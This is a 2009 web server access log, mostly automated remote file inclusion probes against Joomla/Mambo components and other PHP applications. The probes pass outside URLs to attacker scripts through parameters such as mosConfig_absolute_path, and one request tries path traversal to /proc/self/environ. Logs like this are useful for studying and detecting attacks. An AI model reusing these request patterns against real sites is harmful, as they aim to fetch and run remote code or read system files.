218.30.100.97 - - [24/Jun/2009:22:06:40 -0700] "GET /~t290///index1.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 298 /home/users/t/t290/public_html/index1.php "-" "Mozilla/5.0" 0 web.hypersurf.com
218.30.100.97 - - [24/Jun/2009:22:06:40 -0700] "GET /~t290/logs/access.log.0///index1.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 316 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
72.30.79.112 - - [24/Jun/2009:22:13:43 -0700] "GET /~t290/logs/?M=A HTTP/1.0" 200 12360 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
200.80.241.115 - - [24/Jun/2009:22:46:41 -0700] "GET /~t290/logs/access.log.0///vwar/backup/errors.php?error=http://livrariacrescendonafe.com/admin/sistem.gif??? HTTP/1.1" 404 328 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.803" 0 web.hypersurf.com
200.80.241.115 - - [24/Jun/2009:22:46:53 -0700] "GET /~t290/logs///vwar/backup/errors.php?error=http://livrariacrescendonafe.com/admin/sistem.gif??? HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs///vwar "-" "libwww-perl/5.803" 0 web.hypersurf.com
89.42.140.148 - - [24/Jun/2009:22:53:11 -0700] "GET /~t290/logs/access.log HTTP/1.1" 200 426441 /home/users/t/t290/public_html/logs/access.log "-" "tnonqwxmaegd1qk1tclgmk" 2 web.hypersurf.com
222.236.47.188 - - [24/Jun/2009:22:57:57 -0700] "GET /~t290/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 346 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
222.236.47.188 - - [24/Jun/2009:22:57:57 -0700] "GET /~t290/logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 351 /home/users/t/t290/public_html/logs/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
222.236.47.188 - - [24/Jun/2009:22:57:57 -0700] "GET /~t290/logs/access.log.0/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 364 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
82.194.87.219 - - [24/Jun/2009:23:15:28 -0700] "GET /~t290/logs///include/print_category.php?setup[use_category]=1&dir=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 319 /home/users/t/t290/public_html/logs///include "-" "libwww-perl/5.822" 0 web.hypersurf.com
82.194.87.219 - - [24/Jun/2009:23:18:38 -0700] "GET /~t290/logs///include/print_category.php?setup[use_category]=1&dir=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 319 /home/users/t/t290/public_html/logs///include "-" "libwww-perl/5.822" 0 web.hypersurf.com
82.194.87.219 - - [24/Jun/2009:23:19:06 -0700] "GET /~t290/logs///include/print_category.php?setup[use_category]=1&dir=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 319 /home/users/t/t290/public_html/logs///include "-" "libwww-perl/5.822" 0 web.hypersurf.com
218.30.100.97 - - [24/Jun/2009:23:29:39 -0700] "GET /~t290//PhpLinkExchange/bits_listings.php?svr_rootP=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 320 /home/users/t/t290/public_html/PhpLinkExchange "-" "Mozilla/5.0" 0 web.hypersurf.com
218.30.100.97 - - [24/Jun/2009:23:29:40 -0700] "GET /~t290/logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 325 /home/users/t/t290/public_html/logs//PhpLinkExchange "-" "Mozilla/5.0" 0 web.hypersurf.com
218.30.100.97 - - [24/Jun/2009:23:29:40 -0700] "GET /~t290/logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 336 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
124.217.216.86 - - [25/Jun/2009:00:04:19 -0700] "GET /~t290/logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://163.17.8.18/appserv/1.txt??%0D? HTTP/1.1" 404 351 /home/users/t/t290/public_html/logs/administrator "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" 0 web.hypersurf.com
124.217.216.86 - - [25/Jun/2009:00:04:19 -0700] "GET /~t290/logs/access.log.0/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://163.17.8.18/appserv/1.txt??%0D? HTTP/1.1" 404 364 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" 0 web.hypersurf.com
121.130.29.11 - - [25/Jun/2009:00:25:34 -0700] "GET /~t290/logs/access.log.0%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
121.130.29.11 - - [25/Jun/2009:00:25:34 -0700] "GET /~t290//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 337 /home/users/t/t290/public_html/components "-" "Mozilla/5.0" 0 web.hypersurf.com
121.130.29.11 - - [25/Jun/2009:00:25:34 -0700] "GET /~t290/logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//components "-" "Mozilla/5.0" 0 web.hypersurf.com
121.130.29.11 - - [25/Jun/2009:00:28:02 -0700] "GET /~t290//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 337 /home/users/t/t290/public_html/components "-" "Mozilla/5.0" 0 web.hypersurf.com
121.130.29.11 - - [25/Jun/2009:00:28:02 -0700] "GET /~t290/logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//components "-" "Mozilla/5.0" 0 web.hypersurf.com
121.130.29.11 - - [25/Jun/2009:00:28:02 -0700] "GET /~t290/logs/access.log.0//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
74.53.70.114 - - [25/Jun/2009:00:28:30 -0700] "GET /~t290/logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 351 /home/users/t/t290/public_html/logs/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
74.53.70.114 - - [25/Jun/2009:00:28:30 -0700] "GET /~t290/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 346 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
74.53.70.114 - - [25/Jun/2009:00:28:30 -0700] "GET /~t290/logs/access.log.0/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 364 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
72.30.79.112 - - [25/Jun/2009:00:49:57 -0700] "GET /~t290/logs/Jan03.html HTTP/1.0" 200 14819 /home/users/t/t290/public_html/logs/Jan03.html "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
60.43.229.5 - - [25/Jun/2009:01:41:17 -0700] "GET /~t290///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 347 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
60.43.229.5 - - [25/Jun/2009:01:41:23 -0700] "GET /~t290/logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 352 /home/users/t/t290/public_html/logs///administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
60.43.229.5 - - [25/Jun/2009:01:41:23 -0700] "GET /~t290/logs/access.log.0%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 367 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
60.43.229.5 - - [25/Jun/2009:01:54:09 -0700] "GET /~t290///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 347 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
60.43.229.5 - - [25/Jun/2009:01:54:09 -0700] "GET /~t290/logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 352 /home/users/t/t290/public_html/logs///administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
60.43.229.5 - - [25/Jun/2009:01:54:09 -0700] "GET /~t290/logs/access.log.0///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 365 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
87.230.22.39 - - [25/Jun/2009:01:58:37 -0700] "GET /~t290/errors.php?error=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 296 /home/users/t/t290/public_html/errors.php "-" "Mozilla/5.0" 0 web.hypersurf.com
87.230.22.39 - - [25/Jun/2009:01:58:37 -0700] "GET /~t290/logs/errors.php?error=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs/errors.php "-" "Mozilla/5.0" 0 web.hypersurf.com
87.230.22.39 - - [25/Jun/2009:01:58:38 -0700] "GET /~t290/logs/access.log.0%20%20/errors.php?error=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 316 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
193.243.139.4 - - [25/Jun/2009:02:00:04 -0700] "GET /~t290/logs/access.log.0//skin_shop/standard/3_plugin_twindow/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 393 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.803" 0 web.hypersurf.com
193.243.139.4 - - [25/Jun/2009:02:00:04 -0700] "GET /~t290/logs//skin_shop/standard/3_plugin_twindow/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 380 /home/users/t/t290/public_html/logs//skin_shop "-" "libwww-perl/5.803" 0 web.hypersurf.com
83.16.182.130 - - [25/Jun/2009:02:02:12 -0700] "GET /~t290/logs//vwar/convert/mvcw.php?step=1&vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs//vwar "-" "Mozilla/5.0" 0 web.hypersurf.com
83.16.182.130 - - [25/Jun/2009:02:02:12 -0700] "GET /~t290//vwar/convert/mvcw.php?step=1&vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 308 /home/users/t/t290/public_html/vwar "-" "Mozilla/5.0" 0 web.hypersurf.com
83.16.182.130 - - [25/Jun/2009:02:02:12 -0700] "GET /~t290/logs/access.log.0%20%20//vwar/convert/mvcw.php?step=1&vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 328 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
210.4.77.148 - - [25/Jun/2009:02:05:22 -0700] "GET /~t290/logs//vwar/convert/mvcw.php?step=1&vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs//vwar "-" "Mozilla/5.0" 0 web.hypersurf.com
210.4.77.148 - - [25/Jun/2009:02:05:22 -0700] "GET /~t290//vwar/convert/mvcw.php?step=1&vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 308 /home/users/t/t290/public_html/vwar "-" "Mozilla/5.0" 0 web.hypersurf.com
210.4.77.148 - - [25/Jun/2009:02:05:22 -0700] "GET /~t290/logs/access.log.0%20%20//vwar/convert/mvcw.php?step=1&vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 328 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
123.242.165.138 - - [25/Jun/2009:02:21:32 -0700] "GET /~t290/logs/access.log.0//skin_shop/standard/3_plugin_twindow/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt???? HTTP/1.1" 404 393 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.79" 0 web.hypersurf.com
123.242.165.138 - - [25/Jun/2009:02:22:00 -0700] "GET /~t290/logs//skin_shop/standard/3_plugin_twindow/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt???? HTTP/1.1" 404 380 /home/users/t/t290/public_html/logs//skin_shop "-" "libwww-perl/5.79" 0 web.hypersurf.com
87.230.22.39 - - [25/Jun/2009:02:27:54 -0700] "GET /~t290/logs//index.php/?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs//index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
87.230.22.39 - - [25/Jun/2009:02:27:54 -0700] "GET /~t290/logs/access.log.0%20%20//index.php/?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 317 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
87.230.22.39 - - [25/Jun/2009:02:27:54 -0700] "GET /~t290//index.php/?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 297 /home/users/t/t290/public_html/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
74.6.22.120 - - [25/Jun/2009:02:42:01 -0700] "GET /~t290/twllpicts/loonlake1/source/13.htm HTTP/1.0" 200 646 /home/users/t/t290/public_html/twllpicts/loonlake1/source/13.htm "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
77.221.130.17 - - [25/Jun/2009:03:06:17 -0700] "GET /~t290/index.php?mosConfig_live_site=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 295 /home/users/t/t290/public_html/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
77.221.130.17 - - [25/Jun/2009:03:06:17 -0700] "GET /~t290/logs/index.php?mosConfig_live_site=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 300 /home/users/t/t290/public_html/logs/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
77.221.130.17 - - [25/Jun/2009:03:06:17 -0700] "GET /~t290/logs/access.log.0%20%20/index.php?mosConfig_live_site=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
69.175.14.66 - - [25/Jun/2009:03:14:52 -0700] "GET /~t290/logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://crimeancoast.com/thumbnails/id1.txt? HTTP/1.1" 404 325 /home/users/t/t290/public_html/logs//PhpLinkExchange "-" "Mozilla/5.0" 0 web.hypersurf.com
69.175.14.66 - - [25/Jun/2009:03:14:52 -0700] "GET /~t290/logs/access.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://crimeancoast.com/thumbnails/id1.txt? HTTP/1.1" 404 338 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
69.175.14.66 - - [25/Jun/2009:03:14:52 -0700] "GET /~t290//PhpLinkExchange/bits_listings.php?svr_rootP=http://crimeancoast.com/thumbnails/id1.txt? HTTP/1.1" 404 320 /home/users/t/t290/public_html/PhpLinkExchange "-" "Mozilla/5.0" 0 web.hypersurf.com
193.243.139.4 - - [25/Jun/2009:03:23:13 -0700] "GET /~t290/logs/access.log.0/vwar/backup/errors.php?error=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 326 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.803" 0 web.hypersurf.com
193.243.139.4 - - [25/Jun/2009:03:23:13 -0700] "GET /~t290/logs/vwar/backup/errors.php?error=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/vwar "-" "libwww-perl/5.803" 0 web.hypersurf.com
77.221.130.17 - - [25/Jun/2009:03:26:50 -0700] "GET /~t290/logs/access.log.0/index.php?mosConfig_live_site=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
208.38.188.128 - - [25/Jun/2009:03:30:46 -0700] "GET /~t290/logs/access.log.0/index.php?mosConfig_live_site=http://www.infernodancevault.com//modules/tinycontent/admin/cmd.txt?? HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.810" 0 web.hypersurf.com
208.38.188.128 - - [25/Jun/2009:03:30:47 -0700] "GET /~t290/logs/index.php?mosConfig_live_site=http://www.infernodancevault.com//modules/tinycontent/admin/cmd.txt?? HTTP/1.1" 404 300 /home/users/t/t290/public_html/logs/index.php "-" "libwww-perl/5.810" 0 web.hypersurf.com
208.111.94.201 - - [25/Jun/2009:03:31:02 -0700] "GET /~t290/errors.php?error=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 296 /home/users/t/t290/public_html/errors.php "-" "Mozilla/5.0" 0 web.hypersurf.com
208.111.94.201 - - [25/Jun/2009:03:31:02 -0700] "GET /~t290/logs/errors.php?error=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs/errors.php "-" "Mozilla/5.0" 0 web.hypersurf.com
208.111.94.201 - - [25/Jun/2009:03:31:24 -0700] "GET /~t290/logs/access.log.0/errors.php?error=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 314 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
69.175.14.66 - - [25/Jun/2009:03:33:28 -0700] "GET /~t290/logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://crimeancoast.com/thumbnails/id1.txt? HTTP/1.1" 404 336 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
208.111.94.201 - - [25/Jun/2009:03:41:55 -0700] "GET /~t290/logs/errors.php?error=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs/errors.php "-" "Mozilla/5.0" 0 web.hypersurf.com
208.111.94.201 - - [25/Jun/2009:03:41:55 -0700] "GET /~t290/logs/access.log.0/errors.php?error=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 314 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
208.111.94.201 - - [25/Jun/2009:03:41:56 -0700] "GET /~t290/errors.php?error=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 296 /home/users/t/t290/public_html/errors.php "-" "Mozilla/5.0" 0 web.hypersurf.com
208.111.94.201 - - [25/Jun/2009:04:04:39 -0700] "GET /~t290/logs/index.php?mosConfig_live_site=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 300 /home/users/t/t290/public_html/logs/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
208.111.94.201 - - [25/Jun/2009:04:04:39 -0700] "GET /~t290/logs/access.log.0%20%20/index.php?mosConfig_live_site=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
208.111.94.201 - - [25/Jun/2009:04:05:08 -0700] "GET /~t290/index.php?mosConfig_live_site=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 295 /home/users/t/t290/public_html/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
63.223.104.57 - - [25/Jun/2009:04:21:59 -0700] "GET /~t290/logs/access.log.0//components/com_virtuemart/?mosConfig_absolute_path=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 404 331 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.810" 0 web.hypersurf.com
63.223.104.57 - - [25/Jun/2009:04:22:00 -0700] "GET /~t290/logs//components/com_virtuemart/?mosConfig_absolute_path=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 404 318 /home/users/t/t290/public_html/logs//components "-" "libwww-perl/5.810" 0 web.hypersurf.com
208.111.94.201 - - [25/Jun/2009:04:44:53 -0700] "GET /~t290/logs/access.log.0%20%20/index.php?mosConfig_live_site=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
208.111.94.201 - - [25/Jun/2009:04:44:58 -0700] "GET /~t290/index.php?mosConfig_live_site=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 295 /home/users/t/t290/public_html/index.php "-" "Mozilla/5.0" 1 web.hypersurf.com
208.111.94.201 - - [25/Jun/2009:04:45:27 -0700] "GET /~t290/logs/index.php?mosConfig_live_site=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 300 /home/users/t/t290/public_html/logs/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
89.108.83.240 - - [25/Jun/2009:04:49:17 -0700] "GET /~t290/logs/access.log.0/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 360 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.826" 0 web.hypersurf.com
89.108.83.240 - - [25/Jun/2009:04:49:17 -0700] "GET /~t290/logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 347 /home/users/t/t290/public_html/logs/phpffl "-" "libwww-perl/5.826" 0 web.hypersurf.com
79.174.72.73 - - [25/Jun/2009:04:50:18 -0700] "GET /~t290/logs/access.log.0/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kure-lionsclub.com//templates_c/cmdstate.txt? HTTP/1.1" 404 347 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.805" 0 web.hypersurf.com
79.174.72.73 - - [25/Jun/2009:04:50:19 -0700] "GET /~t290/logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kure-lionsclub.com//templates_c/cmdstate.txt? HTTP/1.1" 404 334 /home/users/t/t290/public_html/logs/components "-" "libwww-perl/5.805" 0 web.hypersurf.com
89.108.83.240 - - [25/Jun/2009:04:50:36 -0700] "GET /~t290/logs/access.log.0/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 360 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.826" 0 web.hypersurf.com
89.108.83.240 - - [25/Jun/2009:04:50:37 -0700] "GET /~t290/logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 347 /home/users/t/t290/public_html/logs/phpffl "-" "libwww-perl/5.826" 0 web.hypersurf.com
89.108.83.240 - - [25/Jun/2009:04:52:43 -0700] "GET /~t290/logs/access.log.0%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 361 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.826" 0 web.hypersurf.com
89.108.83.240 - - [25/Jun/2009:04:56:29 -0700] "GET /~t290/logs/access.log.0%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 361 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.826" 0 web.hypersurf.com
208.111.94.201 - - [25/Jun/2009:05:21:55 -0700] "GET /~t290/logs/access.log.0/index.php?mosConfig_live_site=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
79.174.72.73 - - [25/Jun/2009:05:31:32 -0700] "GET /~t290/logs/access.log.0/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 347 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.805" 0 web.hypersurf.com
72.30.79.112 - - [25/Jun/2009:06:07:16 -0700] "GET /~t290/logs/?D=A HTTP/1.0" 200 12360 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
190.144.44.36 - - [25/Jun/2009:06:07:29 -0700] "GET /~t290//skin/zero_vote/error.php?dir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 311 /home/users/t/t290/public_html/skin "-" "Mozilla/5.0" 0 web.hypersurf.com
